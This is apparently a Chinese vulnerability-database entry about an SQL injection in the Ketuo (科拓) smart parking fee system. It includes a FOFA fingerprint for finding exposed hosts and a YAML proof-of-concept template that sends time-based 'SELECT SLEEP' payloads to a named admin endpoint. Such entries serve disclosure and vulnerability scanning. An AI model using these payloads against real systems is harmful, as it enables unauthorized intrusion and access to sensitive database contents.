ketuo-doubt-car-no-list-from-aspx-sqli: 科拓全智能停车收费系统SQL注入漏洞

日期: 2025-09-01 | 影响软件: 科拓全智能停车收费系统 | POC: 已公开

漏洞描述

科拓全智能停车收费系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息 fofa:body="/KT_Css/qd_defaul.css"

PoC代码[已公开]

id: ketuo-doubt-car-no-list-from-aspx-sqli

info:
  name: 科拓全智能停车收费系统SQL注入漏洞
  author: avic123
  severity: high
  verified: true
  description: |
    科拓全智能停车收费系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息
    fofa:body="/KT_Css/qd_defaul.css"
  reference:
    - https://blog.csdn.net/weixin_42207802/article/details/139002532
  tags: ketuo,科拓,sqli
  created: 2025/03/05

rules:
  r0:
    request:
      method: POST
      path: /KT_Admin/CarCard/DoubtCarNoListFrom.aspx
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        start=0&limit=20&filer=1;SELECT SLEEP(5)#
    expression: |
      response.status == 200 && response.latency <= 12000 &&  response.latency >= 10000
  r1:
    request:
      method: POST
      path: /KT_Admin/CarCard/DoubtCarNoListFrom.aspx
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        start=0&limit=20&filer=1;SELECT SLEEP(10)#
    expression: |
      response.status == 200 && response.latency <= 22000 &&  response.latency >= 20000

expression: r0() && r1()

相关漏洞推荐